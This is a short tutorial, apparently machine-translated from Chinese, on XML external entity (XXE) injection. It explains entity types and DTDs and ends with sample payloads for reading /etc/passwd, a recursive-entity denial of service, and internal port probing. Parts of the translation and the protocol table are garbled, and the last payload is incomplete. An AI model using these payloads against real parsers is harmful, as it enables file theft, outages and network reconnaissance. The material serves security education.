XXE (xml external entity injection vulnerability)
xml entity divided into four kinds, namely, internal entity, the entity parameter, predefined entities and external entities
Internal entity:
In the DTD or internal subset (ie, document <! DOCTYPE> part of the statement) declared, used as a reference in the document. In the XML document parsing process, entity references by its representation instead.
Predefined entities:
| entity | description |
|---|---|
| " | Double quotes |
| ' | apostrophe |
| < | Less than, i.e. < |
| > | Is greater than, i.e.,> |
| & | & |
The role of DTD (Document Type Definition) is the legal definition of an XML document building blocks. DTD can be declared within the XML document, you can external references.
Internal DTD declaration
<! DOCTYPE root element [element declaration]>
Reference to an external DTD
<! DOCTYPE root element SYSTEM "filename">
or
<! DOCTYPE root element PUBLIC "public_ID" "filename">
DTD entity is a variable used to define a shortcut to reference a plain text or special characters, you can declare internal or external reference. Internal entity declaration
<! ENTITY entity name "value of the entity">
Parameter entities
Parameter entities are used only within subsets of the DTD and documentation of centralized, standardized definitions of XML, the only reference parameter entities in the DTD. Declarations and parameter entity references are based on a percent sign%. And the parameters in the DTD entity reference is parsed appreciated, the replacement text will become part of the DTD. Entity with "%" of the type of character (% or hex-encoded) statement, and only parsed and validated before used to replace the DTD text or other content:
Reference external entities
<! ENTITY entity name SYSTEM "URI"> where the agreement in the form of SYSTEM keyword is marked external entities, external entities to accept local files, http, file content, etc.
| libxml2 | php | java | .net |
|---|---|---|---|
| file http ftp |
file http ftp php compress.zlib compress.bzip2 datag1obphar |
http https ftp file jar netdoc mailto gopher * |
file http https ftp |
xxe based attacks have echoed, based on an error and blind xxe
hazards: When allowed to refer to external entities, by constructing a malicious content, can cause any harm to read the file, execute system commands, detect network ports within the network to attack websites.
<!-- 任意文件读取 -->
<? xml version="1.0"encoding="utf-8"?>
<!DOCTYPE rohit[
<! ENTITY abc SYSTEM "file:///etc/passwd">
]>
<abc>&abc;</abc><!--xml递归调用造成拒绝服务攻击-->
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz><!--探测内网端口-->
<? xmL version="1.0"?>
<! DOCTYPE ANY[
<! ENTITY xxe SYSTEM "http://192.168.1.1:81">
<x>&xxe;</x>